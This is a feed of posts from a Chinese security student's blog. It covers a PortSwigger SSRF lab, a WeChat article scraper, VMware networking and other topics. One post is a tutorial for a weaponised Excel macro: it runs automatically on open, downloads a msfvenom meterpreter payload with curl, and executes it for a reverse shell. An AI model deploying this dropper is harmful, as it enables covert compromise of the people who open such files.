ANINEGの小屋 2024-05-06T09:44:44.328Z https://blog.anineg.space/ ANINEG Hexo Basic SSRF against the local server https://blog.anineg.space/2024/05/06/ssrf/ 2024-05-06T09:07:52.000Z 2024-05-06T09:44:44.328Z Lab: Basic SSRF against the local server

一、基础概念

Server-side request forgery (SSRF),服务端请求伪造,简单来说,就是你可以访问A站点,A站点可以访问内网的B站点,你不可以直接访问B站点,但是由于A站点的防护措施或者校验不足,你可以通过控制请求,访问到B站点上的资源,然后A站点将内部网络返回的结果传递给你,你就完成了对内网的攻击。SSRF可能可以实现扫描内网,向内部任意主机的任意端口发送构造的攻击请求,攻击内网WEB应用,读取文件等等。

二、题目

题目链接: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

APPRENTICE

This lab has a stock check feature which fetches data from an internal system.

这个实验室有一个库存检查功能,可以从内部系统获取数据。

To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

要解决实验室问题,请更改库存检查URL以访问的管理界面http://localhost/admin并删除用户carlos

三、实验

打开实验环境,是一个商品页面:

image-20240506164400830

在商品详情中,有一个可以查询库存的按钮:

image-20240506164509496

开启Burpsuit对这个按钮的动作进行抓取:

image-20240506165607493

这里的API:

1
2
3
http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
URL解码后为
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

根据题目的提示,我们用这个API去访问http://localhost/admin

image-20240506170251909

成功进入到admin页面。于是便可进行删除用户carlos的操作:

在Raw中看到删除的按钮:

1
2
<span>carlos - </span>
                            <a href="/admin/delete?username=carlos">Delete</a>

image-20240506170601931

问题解决!

]]> <h1>Lab: Basic SSRF against the local server</h1> <h2 id="一、基础概念">一、基础概念</h2> <p>Server-side request forgery (SSRF),服务端请求伪造,简单来说,就是你可以访问A站点, Python网络爬虫之微信公众号(待改进) https://blog.anineg.space/2023/05/31/pypachong/ 2023-05-31T08:44:27.000Z 2023-06-01T06:43:29.875Z 前言

近日得到一任务:需要爬取某个公众号的文章并保存到本地,然后进行分析。那么对于公众号爬取确实是比较少见而且有点难度,在搜集资料后,结合网络文章的经验以及自己的改进,实现了这一功能。参考文章会在文末列出。

准备

  • Python环境
  • 电脑或是服务器
  • 一个自己能登陆的微信公众号

批量获取公众号推送链接

由于公众号的每一篇文章的链接似乎是随机生成的,相互之间没有关联,因此要批量获取某公众号的文章链接需要用到一定的方法,搜狗微信只能获取到最近的几篇文章,并不能做到全部收录。这里就需要用到自己的微信公众号的后台了。

登录微信公众平台,新建文章,点击超链接。此时打开浏览器的检查模式,选择网络(Network),然后在窗口中选择你要爬取的公众号。

获取fakeid和token

这时我们可以看到,网络中出现了一个“appmsg”开头的内容,这就是我们需要的目标。将它的请求URL记录在下面(*隐去了部分内容):

1
https://mp.weixin.qq.com/cgi-bin/appmsg?action=list_ex&begin=0&count=5&fakeid=MzI2********Mw==&type=9&query=&token=465***914lang=zh_CN&f=json&ajax=1

该链接分为三部分:

  1. https://mp.weixin.qq.com/cgi-bin/appmsg 请求的基础部分
  2. ?action=list_ex 常用于动态网站,实现不同的参数值而生成不同的页面或者返回不同的结果
  3. &begin=0&count=5&fakeid=MzI2MTE0NTE3Mw==&type=9&query=&token=465219914&lang=zh_CN&f=json&ajax=1 设置各种参数,我们需要的就是用到这里的fakeid=MzI2********Mw==以及token=465***914

获取浏览器Cookie和User-Agent

在python运行时,我们需要它能以登录的状态去访问该URL。因此需要找到我们浏览器保存的Cookie和User-Agent:

开浏览器的检查模式,选择文档(Document)。此时刷新网页,就可以看到一个“home”开头的内容:

从这里我们可以获得Cookie和User-Agent参数。

保存为yaml文件方便加载

将上述四个参数保存至一个wechat.yaml文件中,方便后面在python中加载。

文件内容:

1
2
3
4
cookie : RK=P/Pd1qTtZk; ptcz......
user_agent : Mozilla/5.0......
fakeid : MzI2.......
token : 2023483153......

URL爬取

这部分主要参考了@Author:YuFanWenShu的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import json
import requests
import time
import random
import yaml

#加载参数
with open("wechat.yaml", "r") as file: #将上文的wechat.yaml放在同一文件夹
    file_data = file.read()
config = yaml.safe_load(file_data)

headers = {
    "Cookie": config['cookie'],
    "User-Agent": config['user_agent']
}

# 请求参数
url = "https://mp.weixin.qq.com/cgi-bin/appmsg"
begin = "0"
params = {
    "action": "list_ex",
    "begin": begin,
    "count": "5",
    "fakeid": config['fakeid'],
    "type": "9",
    "token": config['token'],
    "lang": "zh_CN",
    "f": "json",
    "ajax": "1"
}

# 存放结果
app_msg_list = []
# 在不知道公众号有多少文章的情况下,使用while语句
# 也方便重新运行时设置页数
with open("app_msg_list.csv", "w", encoding='utf-8') as file:
    file.write("文章标识符aid,标题title,链接url,时间time\n")
page = 0
while True:
    begin = page * 5
    params["begin"] = str(begin)
    # 随机暂停几秒,避免过快的请求导致过快的被查到
    time.sleep(random.randint(1, 10))
    resp = requests.get(url, headers=headers, params=params, verify=False)
    # 微信流量控制, 退出
    if resp.json()['base_resp']['ret'] == 200013:
        print("frequencey control, stop at {}".format(str(begin)))
        time.sleep(3600)
        continue

    # 如果返回的内容中为空则结束
    if len(resp.json()['app_msg_list']) == 0:
        print("all ariticle parsed")
        break

    msg = resp.json()
    if "app_msg_list" in msg:
        for item in msg["app_msg_list"]:
            info = '"{}","{}","{}","{}"'.format(str(item["aid"]), item['title'], item['link'], str(item['create_time']))
            with open("app_msg_list.csv", "a", encoding='utf-8') as f:
                f.write(info + '\n')
        print(f"第{page}页爬取成功\n")
        print("\n".join(info.split(",")))
        print("\n\n---------------------------------------------------------------------------------\n")

    # 翻页
    page += 1

经测试,每爬取大约200篇文章会遇到流量限制,此时需要等待一小时左右。一个账号一天最多只能爬取1000篇左右,我在这里测试的时候,是在大约1200篇的时候停下了,可能需要一天甚至更长的时间才能继续…….

将爬取的文章批量下载至本地(待改进)

使用pdfkit将文章转为PDF,可能需要安装:

1
2
3
pip install pdfkit
pip install bs4
pip install html5lib

还需要安装一个工具:wkhtmltopdf下载链接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import csv
import re
import pdfkit
import requests
from bs4 import BeautifulSoup

# 选项
options = {
    'page-size': 'A4',
    #     'margin-top': '0.75in',
    #     'margin-right': '0.75in',
    #     'margin-bottom': '0.75in',
    #     'margin-left': '0.75in',
    'encoding': "UTF-8",
    # "enable-local-file-access": True,
    #      'custom-header': headers,
    #     'debug-javascript': [''],
    #     'javascript-delay': 10000,
    #     'no-stop-slow-scripts': "",
    #     'load-media-error-handling': 'abort',
}

path_wkthmltopdf = r'C:\Program Files\wkhtmltopdf\bin\wkhtmltopdf.exe'
config = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf)

# 替换特殊字符
def validate_title(title):
    rstr = r"[\/\\\:\*\?\"\<\>\|]"  # '/ \ : * ? " < > |'
    new_title = re.sub(rstr, "_", title)  # 替换为下划线
    new_title = new_title.replace(':', ' _')
    new_title = new_title.replace('?', '_')
    return new_title

with open("D:\\turn-to-pdf\\app_msg_list.csv", 'r', encoding='utf-8') as f:
    reader = csv.reader(f)
    # next(reader)  # 跳过CSV文件的表头行
    i = 1
    for row in reader:
        aid, title, url, time = row
        if url.find('mp.weixin.qq.com') > 0:
            res = requests.get(url)
            if '此内容发送失败无法查看' in res.text:
                continue
            # data-src替换为src 有时候返回的正文被隐藏了,将hidden去掉
            html = res.text.replace("data-src", "src").replace('style="visibility: hidden;"', "")

            soup = BeautifulSoup(html, features="html5lib")
            # 选择正文(去除javascrapt等)
            html = soup.select('div#img-content')[0]
            html = str(html).replace("font-family: 仿宋;", "")
            output = title + '.pdf'
            pdfkit.from_string(str(html), output, configuration=config, options=options)
            print(f"{i}:{title} 已完成")
            i += 1
        else:
            print(f"Skipping {url} because it's not from WeChat.")

这一步有很多奇怪的问题,比如如果原文中有仿宋字体的话,在转成PDF后全部都不能正常显示。于是在转为PDF之前将HTML中的所有仿宋全部替换为默认字体。

这一部分还有诸多问题没有解决,但目前小部分的转换应该没有太大问题。偶尔还会遇到一些报错,暂时也还没有解决。如果各位大佬有办法,欢迎在评论区留言!

参考文章:

用Python爬取指定公众号所有文章

https://zhuanlan.zhihu.com/p/379062852

【Python】将微信收藏的文章批量导出为pdf

https://blog.csdn.net/qq_32832803/article/details/122508085

]]> 微信公众号文章爬取及保存至本地pdf(待改进) 主页源码修改记录(简单网页倒计时+跳转+文本替换) https://blog.anineg.space/2023/04/14/indexcode/ 2023-04-14T03:35:33.000Z 2023-04-14T08:29:33.904Z 网站模板

我的主页ANINEGの小屋模板是使用的来自https://html5up.net的免费模板,以下是网页的介绍:

  • Fully Responsive
  • Built on intelligent HTML5 + CSS3
  • Super Customizable
  • 100% Free under the Creative Commons

有需要的同学们可以去自行下载。

源码修改

在原有模板的基础上,我增添了如下功能:

  1. 它会在页面上显示10秒倒计时,结束后后自动跳转到博客页。
  2. 在倒计时这10秒中可以对博客网页进行预加载。
  3. 当用户单击网页任何位置时,倒计时停止,并将显示倒计时的文本替换为“欢迎访问ANINEG的小屋”

以下是实现过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<script>
    var preloadUrl = "https://blog.anineg.space/"; // 需要预加载的页面地址
    var iframe = document.createElement("iframe"); // 创建一个iframe元素
    iframe.style.display = "none"; // 将iframe元素隐藏
    iframe.src = preloadUrl; // 设置预加载页面的地址
    document.body.appendChild(iframe); // 将iframe元素添加到body中,开始预加载

    var count = 13; // 设置倒计时时间
    var intervalId = setInterval(function() {
        count--;
        document.getElementById("countdown").innerHTML = count; // 更新倒计时数字
        if (count <= 0) {
            clearInterval(intervalId); // 清除计时器
            document.getElementById("countdown-text").innerHTML = "欢迎访问ANINEG的小屋"; // 替换倒计时提示为“欢迎访问”
            window.location.href = "https://blog.anineg.space/"; // 跳转到下一个页面
        }
    }, 1000);

    document.addEventListener("click", function() {
        clearInterval(intervalId); // 清除计时器
        document.getElementById("countdown-text").innerHTML = "欢迎访问ANINEG的小屋"; // 替换倒计时提示为“欢迎访问”
    });
</script>

<p id="countdown-text"><span id="countdown">13</span> 秒后自动前往博客页···</p>

实际上,该模板的入场动画大概耗费3秒左右,因此需要10秒自动跳转的效果就需要将预设调为13秒。

在预加载部分,在倒计时开始时,使用JavaScript动态创建一个<iframe>元素,并将需要预加载的页面设置为该<iframe>src属性。这样,浏览器就会在倒计时期间开始预加载该页面,从而提高用户体验。

接着,我们创建了一个计时器,每秒减少计数器变量count的值,并更新页面上的倒计时数字。当count的值减少到0时,清除计时器并跳转到下一个页面。最后,在页面上添加了一个事件监听器,当用户单击页面上的任何位置时,清除计时器,停止倒计时。

最后,我们在页面中添加了一个<p>元素,并将其id属性设置为"countdown-text",用于显示倒计时提示或替换后的新文本。在计时器停止时,我们使用JavaScript修改了该元素的文本内容,将倒计时提示替换为需要显示的新文本。同时在单击事件监听器中补充添加了一行代码,用于在停止计时器时替换倒计时提示为“欢迎访问”文本。这样,无论是计时器正常结束还是被单击事件停止,都会显示“欢迎访问”文本。

]]> “ANINEGの小屋”主页源码及微调记录 反弹Shell:通过Excel表格进行远控 https://blog.anineg.space/2023/04/02/officevba/ 2023-04-02T04:36:21.000Z 2023-04-14T08:16:29.605Z 讲在前面

很久没有更新啦,自从12月新冠开始再加上过年和开学考试再加上亿点点的划水,不知不觉就过去这么久了。那么今天刚好开完了社团的分享会,也一起在这里更新一下内容,也算是作为这次分享的记录了。

什么是宏?

Office宏,译自英文单词Macro。宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。

Visual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件,也可说是一种应用程式视觉化的Basic 脚本。

如何利用?

我们创建一个启用宏的excel表格,例如值日名单.xlsm

点击视图--查看宏,在这里创建一个AutoOpen

1.弹出计算器

在弹出的VBA中,修改为如下代码,点击运行,即可弹出计算器。

1
2
3
4
5
6
7
Sub AutoOpen()
    LaunchCalculator
End Sub

Sub LaunchCalculator()
    Shell "calc"
End Sub

原理其实就是在shell中输入calc,启动计算器。

启动Excel时自动执行

在左侧ThisWorkbook中添加如下代码:

1
2
3
Private Sub Workbook_Open()
    Call AutoOpen
End Sub

可以令excel在启动时自动运行AutoOpen

2.浏览器全屏访问指定网页

以火狐浏览器为例:

代码如下,其中

firefoxPath是指火狐浏览器的安装路径。

websiteURL是指要打开的网页。

--kiosk是指定浏览器全屏模式启动,也可以修改为-url以普通模式启动。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Sub AutoOpen()
    OpenWeb
End Sub

Sub OpenWeb()
    Dim firefoxPath As String
    Dim websiteURL As String
    
    firefoxPath = "C:\Program Files\Mozilla Firefox\firefox.exe"
    websiteURL = "https://anineg.space/"
    
    
    Call Shell(firefoxPath & " --kiosk " & websiteURL, vbNormalFocus)
End Sub

3.利用反弹shell控制

在KALI(IP:192.168.80.128) 中生成nc.exe,具体过程不再详细叙述,给出命令行如下:

1
2
3
4
5
6
7
8
9
cd /var/www/html

msfconsole   

use windows/x64/meterpreter_reverse_tcp

show options

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.80.128 lport=4444 -f exe -o nc.exe

现在在/var/www/html路径下有nc.exe文件,我们需要它能够在Windows上被下载,所以我们启动web服务:

1
systemctl start apache2.service

如果此时在Windows浏览器中打开:http://192.168.80.128/nc.exe ,文件就可以被下载了。

回到Excel中,修改代码如下:

原理同上,就是使用curl帮我们下载文件,然后在cmd中直接运行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Sub AutoOpen()
    Downloadandopen
End Sub

Sub Downloadandopen()
    Dim curlPath As String
    Dim fileURL As String
    Dim downloadedFilePath As String
    Dim command As String
    
    curlPath = "C:\Windows\System32\curl.exe"
    fileURL = "http://192.168.80.128/nc.exe"
    downloadedFilePath = "C:\Users\Administrator\Desktop\nc.exe"
    
    command = curlPath & " -o " & downloadedFilePath & " " & fileURL
    Call Shell(command, vbNormalFocus)

    Call Shell(downloadedFilePath, vbNormalFocus)
End Sub

与此同时,在KALI上需要开启监听:

1
2
3
4
5
6
7
8
9
msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set lhost 192.168.80.128

exploit

这样,当Excel表格在启动时就会自动连接至攻击机,渗透完成。

当然,对nc.exe做一下免杀效果会更好,如果以后有机会我会在这里继续更新一下,

本测试仅作学习原理探究,严禁去做违法的事情!

]]> 利用Excel就能搞渗透? 搭建几乎0成本的个人网盘 https://blog.anineg.space/2022/11/20/yunpan/ 2022-11-20T03:00:32.000Z 2023-04-14T08:16:44.953Z Onedrive-Vercel-Index

最近在网上发现了一个挺有意思的项目onedrive-vercel-index,它可以在Vercel上部署一个属于你自己的网盘。那么相比于百度网盘,你对他有着很高的控制权,并不需要担心你的资源会被河蟹。那么至于网速,Onedrive给的带宽不太稳定,有时可以跑到满速,有时只有3MB/s,但怎么说也比某度网盘良心多了。

但这个网盘最大的缺点就在于空间上。现在注册Onedrive默认是5GB的空间,这显然不够用。但是也并非没有办法,我们在某宝上花个大概三块钱就可以把一个账号的空间永久提升至15GB。当然,如果你是购买了office365的话,那你就可以拿到1T的容量,就不需要担心什么容量的问题。网上还有一种教育版的,容量为1-5T,但是我不建议大家使用,因为这个账号的管理员可以看到你的文件,大家应该都知道数据的重要性,所以不要贪便宜使用这种。

最后一个问题,Vercel给你提供默认的域名大概率由于某些原因无法访问,所以你还需要拥有一个自己的域名,并把它解析到Vercel上。购买一个域名其实并不贵,如果是新用户就会更便宜了。例如.space .top .asia这类,新用户只需要个位数就能拿下一年,甚至在搞活动的时候一块钱就能拿下一个.cn域名。一个域名可以解析到很多服务器,对于已经有域名的同学来说,这个成本直接忽略不计。

因此,与我个人而言,搭建这个基本上是不需要成本的,只是需要花费那么一丢丢的时间。但是对于刚上手的同学们来说,需要那么一点点的开销,但相对于某度会员或者是他们卖的那种“24小时高速下载券”来说并不多。

搭建网盘

准备工作

  • 一台能上网的电脑
  • 一个GitHub账号
  • 一个Vercel账号
  • 一个Onedrive账号

打开 onedrive-vercel-index 的项目地址Fork 到自己的账号中。

打开项目中的/config/site.config.js,这个就是你的网盘的配置文件了,按照提示进行修改。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/**
 * This file contains the configuration used for customising the website, such as the folder to share,
 * the title, used Google fonts, site icons, contact info, etc.
 */
module.exports = {
  // This is what we use to identify who you are when you are initialising the website for the first time.
  // Make sure this is exactly the same as the email address you use to sign into your Microsoft account.
  // You can also put this in your Vercel's environment variable 'NEXT_PUBLIC_USER_PRINCIPLE_NAME' if you worry about
  // your email being exposed in public.
  userPrincipalName: process.env.NEXT_PUBLIC_USER_PRINCIPLE_NAME || '此处填写你的Onedrive账号',

  // [OPTIONAL] This is the website icon to the left of the title inside the navigation bar. It should be placed under the
  // /public directory of your GitHub project (not your OneDrive folder!), and referenced here by its relative path to /public.
  icon: '/icons/aninegtubiao.png(你的网站图标路径)',

  // Prefix for KV Storage
  kvPrefix: process.env.KV_PREFIX || '',

  // The name of your website. Present alongside your icon.
  title: "此处填写你的网站名字",

  // The folder that you are to share publicly with onedrive-vercel-index. Use '/' if you want to share your root folder.
  baseDirectory: '/Public(你要在网页上展示的文件夹)',

  // [OPTIONAL] This represents the maximum number of items that one directory lists, pagination supported.
  // Do note that this is limited up to 200 items by the upstream OneDrive API.
  maxItems: 100,

  // [OPTIONAL] We use Google Fonts natively for font customisations.
  // You can check and generate the required links and names at https://fonts.google.com.
  // googleFontSans - the sans serif font used in onedrive-vercel-index.
  googleFontSans: 'Inter',
  // googleFontMono - the monospace font used in onedrive-vercel-index.
  googleFontMono: 'Fira Mono',
  // googleFontLinks -  an array of links for referencing the google font assets.
  googleFontLinks: ['https://fonts.googleapis.com/css2?family=Fira+Mono&family=Inter:wght@400;500;700&display=swap'],

  // [OPTIONAL] The footer component of your website. You can write HTML here, but you need to escape double
  // quotes - changing " to \". You can write anything here, and if you like badges, generate some with https://shields.io
  footer:
    'Copyright © 2022 <a href="https://anineg.space/" target="_blank">ANINEG</a>  &nbsp&nbsp|&nbsp&nbsp  网盘资源仅供学习交流,严禁用于商业用途,请于24小时内删除(这里是页脚的内容)',

  // [OPTIONAL] This is where you specify the folders that are password protected. It is an array of paths pointing to all
  // the directories in which you have .password set. Check the documentation for details.
  protectedRoutes: ['/个人', '/(这里几个地方填你要加密的文件夹的路径,将密码存成.password文件放在文件夹下)'],

  // [OPTIONAL] Use "" here if you want to remove this email address from the nav bar.
  email: 'mailto:email@anineg.space(别人联系你的邮箱地址,不要删掉就行)',

  // [OPTIONAL] This is an array of names and links for setting your social information and links.
  // In the latest update, all brand icons inside font awesome is supported and the icon to render is based on the name
  // you provide. See the documentation for details.
  links: [
    {
      name: '主页',
      link: 'https://anineg.space/',
    },
  ],//这里填导航栏上你想要显示的链接

  // This is a day.js-style datetime format string to format datetimes in the app. Ref to
  // https://day.js.org/docs/en/display/format for detailed specification. The default value is ISO 8601 full datetime
  // without timezone and replacing T with space.
  datetimeFormat: 'YYYY-MM-DD HH:mm:ss',
}

然后打开 Vercel 官网注册登录,然后点 New Project,然后 Import 你刚刚 Fork 的仓库。然后点击 Deploy,仓库就会自动开始部署,一两分钟以后就好了。接下来,打开 Marketplace 中的 Upstash,点击 Add Integration,然后选中你的账户,再选中你部署的仓库。如果这时出现了一些选项,最好都填上勾上。等待 Upstash 创建 Redis 数据库。完成创建后,在项目的 Deployments 中将项目 Redeploy。重新部署完成后,在Settings-Domains中填写你的域名并将其解析至Vercel后,即可访问部署好的网站。

打开网站,根据网站的引导进行操作即可。到这里,你就拥有了一个自己的网盘了!

当然,拿它来当图床,我想也是很不错的。

ANINEGの网盘

最后,放上我的网盘来给大家参考一下:

image-20221120120327292

网盘链接:

ANINEGの网盘

https://pan.anineg.space/zh-CN/

]]> 如何使用最低的成本搭建一个属于自己的网盘? ZoomEye-网络空间搜索引擎 https://blog.anineg.space/2022/10/09/zoomeye/ 2022-10-09T08:30:38.000Z 2022-10-10T08:45:02.051Z ZoomEye (钟馗之眼)

一个针对网络空间的搜索引擎

ZoomEye

得益于科技的高速发展,现在接入互联网的设备五花八门。除了PC和服务器,还有路由器、物联网家电、平板电脑、手机等,甚至还有监控探头、工业控制中的SCADA系统等比较敏感的设备。这些设备被视作节点,共同组成了我们所处的的网络空间(Cyberspace)

ZoomEye(“钟馗之眼”)网络空间搜索引擎正是一个检索网络空间节点的搜索引擎。通过后端的分布式爬虫引擎(无论谁家的搜索引擎都是这样)对全球节点的分析,对每个节点的所拥有的特征进行判别,从而获得设备类型、固件版本、分布地点、开放端口服务等信息。

ZoomEye 是什么?怎么用?

https://zhuanlan.zhihu.com/p/19710755

其他网络空间搜索引擎

目前国内外的网络空间搜索引擎有 shodan、zoomeye、cnesys、fofa

Shodan

Shodan是目前最为知名的黑客搜索引擎,它是由计算机程序员约翰·马瑟利(John Matherly)于 2009 年推出的,他在 2003 年就提出了搜索与 Internet 链接的设备的想法。发展至今已经变成搜索资源最全,搜索性能最强,TOP1 级别的网络资产搜索引擎。

image-20221010164225527

Censys

Censys 是由密歇根大学的计算机科学家创立,帮助信息安全从业人员发现、监控和分析从互联网访问的设备的平台,Censys 能够扫描整个互联网,每天扫描 IPv4 地址空间,以搜索所有联网设备并收集相关的信息,并返回一份有关资源(如设备、网站和证书)配置和部署信息的总体报告。

image-20221010164200074

FOFA

FOFA是白帽汇推出的一款网络空间搜索引擎,它通过进行网络空间测绘,能够帮助研究人员或者企业迅速进行网络资产匹配,例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。

image-20221010164142922

]]> <p class="p center logo large">ZoomEye (钟馗之眼)</p> <p class="p center small">一个针对网络空间的搜索引擎</p> <p><img src="https://img.anineg.space/zoomeye2 桥接模式、NAT模式和仅主机模式 https://blog.anineg.space/2022/10/05/vmnet/ 2022-10-05T07:37:35.000Z 2022-10-05T09:08:55.671Z 虚拟机网络

在VMware中,虚拟机的网络连接主要是由VMware创建的虚拟交换机(也叫做虚拟网络)负责实现的,VMware可以根据需要创建多个虚拟网络。

在Windows系统的主机上,VMware最多可以创建20个虚拟网络,每个虚拟网络可以连接任意数量的虚拟机网络设备;在Linux系统的主机上,VMware最多可以创建255个虚拟网络,但每个虚拟网络仅能连接32个虚拟机网络设备。VMware的虚拟网络都是以”VMnet+数字”的形式来命名的,例如 VMnet0、VMnet1、VMnet2……以此类推(在Linux系统的主机上,虚拟网络的名称均采用小写形式,例如 vmnet0 )。

当我们安装VMware时,VMware会自动为3种网络连接模式各自创建1个虚拟机网络(如下图):VMnet0(桥接模式)、VMnet8(NAT模式)、VMnet1(仅主机模式)。此外,我们也可以根据需要自行创建更多的虚拟网络。

image-20221005153913571

桥接模式

VMware桥接模式,也就是将虚拟机的虚拟网络适配器与主机的物理网络适配器进行交接,虚拟机中的虚拟网络适配器可通过主机中的物理网络适配器直接访问到外部网络。简而言之,这就好像在局域网中添加了一台新的、独立的计算机一样。因此,虚拟机也会占用局域网中的一个IP地址,并且可以和其他终端进行相互访问。

桥接模式网络连接支持有线和无线主机网络适配器。如果你想把虚拟机当做一台完全独立的计算机看待,并且允许它和其他终端一样的进行网络通信,那么桥接模式通常是虚拟机访问网络的最简单途径。

示例

image-20221005170013772

NAT模式

NAT,是Network Address Translation的缩写,意即网络地址转换。NAT模式也是VMware创建虚拟机的默认网络连接模式。使用NAT模式网络连接时,VMware会在主机上建立单独的专用网络,用以在主机和虚拟机之间相互通信。虚拟机向外部网络发送的请求数据”包裹”,都会交由NAT网络适配器加上”特殊标记”并以主机的名义转发出去,外部网络返回的响应数据”包裹”,也是先由主机接收,然后交由NAT网络适配器根据”特殊标记”进行识别并转发给对应的虚拟机,因此,虚拟机在外部网络中不必具有自己的IP地址。从外部网络来看,虚拟机和主机在共享一个IP地址,默认情况下,外部网络终端也无法访问到虚拟机。

此外,在一台主机上只允许有一个NAT模式的虚拟网络。因此,同一台主机上的多个采用NAT模式网络连接的虚拟机也是可以相互访问的。

示例

image-20221005170142024

仅主机模式

仅主机模式,是一种比NAT模式更加封闭的的网络连接模式,它将创建完全包含在主机中的专用网络。仅主机模式的虚拟网络适配器仅对主机可见,并在虚拟机和主机系统之间提供网络连接。相对于NAT模式而言,仅主机模式不具备NAT功能,因此在默认情况下,使用仅主机模式网络连接的虚拟机无法连接到Internet(在主机上安装合适的路由或代理软件,或者在Windows系统的主机上使用Internet连接共享功能,仍然可以让虚拟机连接到Internet或其他网络)。

在同一台主机上可以创建多个仅主机模式的虚拟网络,如果多个虚拟机处于同一个仅主机模式网络中,那么它们之间是可以相互通信的;如果它们处于不同的仅主机模式网络,则默认情况下无法进行相互通信(可通过在它们之间设置路由器来实现相互通信)。

参考文章:

桥接模式、NAT模式和仅主机模式

https://blog.csdn.net/swadian2008/article/details/109518783

]]> <h1 id="虚拟机网络"><a href="#虚拟机网络" class="headerlink" title="虚拟机网络"></a>虚拟机网络</h1><p>在VMware中,虚拟机的网络连接主要是由VMware创建的虚拟交换机(也叫做虚拟网络)负责实现的,VMware可以 TCP协议传输数据还原测试 https://blog.anineg.space/2022/10/04/tcptest/ 2022-10-04T06:02:07.000Z 2022-10-04T07:10:44.680Z 相关原理:

TCP(Transmission Control Protocol,传输控制协议)是基于连接的协议,也就是说,在正式收发数据前,必须和对方建立可靠的连接。一个TCP连接必须要经过三次“对话”才能建立起来,其中的过程非常复杂,我们这里只做简单、形象的介绍,你只要做到能够理解这个过程即可。我们来看看这三次对话的简单过程:主机A向主机B发出连接请求数据包:“我想给你发数据,可以吗?”,这是第一次对话;主机B向主机A发送同意连接和要求同步(同步就是两台主机一个在发送,一个在接收,协调工作)的数据包:“可以,你什么时候发?”,这是第二次对话;主机A再发出一个数据包确认主机B的要求同步:“我现在就发,你接着吧!”,这是第三次对话。三次“对话”的目的是使数据包的发送和接收同步,经过三次“对话”之后,主机A才向主机B正式发送数据。

QQ的文件发送是怎样的过程呢?通常,发送文件的计算机首先要通过消息服务器将其IP地址发送给接收计算机,当接收计算机同意接收的确认消息反馈到消息服务器后,消息服务器将据此设置好文件传输对话。随即,发送计算机与接收计算机就会在确定好的端口范围内,建立起TCP或UDP连接开始文件的检索与传输。

在默认状态下,QQ优先采用了UDP(User Data Protocol,用户数据报协议)协议传送数据,而对可靠性要求高的数据通讯系统往往使用TCP协议传输数据。与TCP协议不同,UDP协议并不提供数据传送的验证机制——在整个文件传输过程中如果出现数据报的丢失,协议本身并不能作出任何的检测或提示。因此,通常人们把UDP协议称为不可靠的传输协议。 UDP协议适用于无须应答、要求时效的软件使用,这样的设计正好与QQ追求的目标相符,所以QQ优先使用了此协议进行一切功能应用。但是,由于UDP协议具有不可靠性,常会因种种原因导致消息或数据的发送失败(很多时候会发现发送文件给对方接收时,对方根本收不到要求接收文件的消息。或是发送聊天消息时,对方根本没有收到过消息)。显然,UDP协议由于排除了信息可靠传递机制,将安全和排序等功能移交给上层应用来完成,极大降低了执行时间,使速度得到了保证。QQ在数据传输上更注重实际性能,为了获得更好的使用效果,往往可以牺牲一定的可靠性。因此,使用QQ来传输数据,在很多时候就成了一个“不错”的选择。(来自互联网)

测试环境:

将手机与电脑连接至同一局域网中。

  • 手机IP:192.168.31.216

    Screenshot_20221004_140105

  • 电脑IP:192.168.31.182

    QQ截图20221004140012

Wireshark抓包

启动WireShark,选择WLAN过滤器:

QQ截图20221004132831

在过滤器中输入:ip.src == 192.168.31.216以捕获/过滤指定ip地址(手机)数据包。

12345664556

此时,我们在手机上发送一张图片给电脑,我们可以看到Wireshark捕获了大量数据包。其中这一项就是我们刚刚发送的图片:

QQ截图20221004135150

右键,选择“追踪流=>TCP流”

QQ截图20221004135442

数据格式选择“原始数据”,然后将其另存为新文件。

QQ截图20221004135514

数据还原

使用16进制编辑器(如WinHex)打开文件,找到jpg格式图片的文件头FF D8 FF,并把文件头前面的数据删除:

QQ截图20221004135748

保存后,将文件后缀改为.jpg,至此,文件得以还原:

QQ截图20221004135901

文件头标识及对应类型表

https://anineg.space/2022/07/10/yinxie2/#文件头标识及对应类型表:

]]> <details class="folding-tag" yellow=""><summary> 相关原理: </summary> <div class="content"> <p>TCP(Transmission Cont Metasploitable2靶机学习记录 https://blog.anineg.space/2022/10/02/Metasploitable2/ 2022-10-02T04:27:33.000Z 2022-10-04T07:11:02.902Z 关于Metasploitable2

这是Metasploitable2(Linux)

Metasploitable是一个故意易受攻击的Linux虚拟机。此VM可用于进行安全培训、测试安全工具和实践常见的渗透测试技术。

默认登录名和密码为msfadmin:msfadmin。

切勿将此VM暴露于不受信任的网络(如果您有任何疑问,请使用NAT或仅主机模式)。

要联系开发者,请发送电子邮件至msfdev@metasploit.com

有关详细信息,请参阅以下URL:

名称Metasploitable2
发布日期2012年6月13日
作者rapid7user
系列-
网页https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

环境

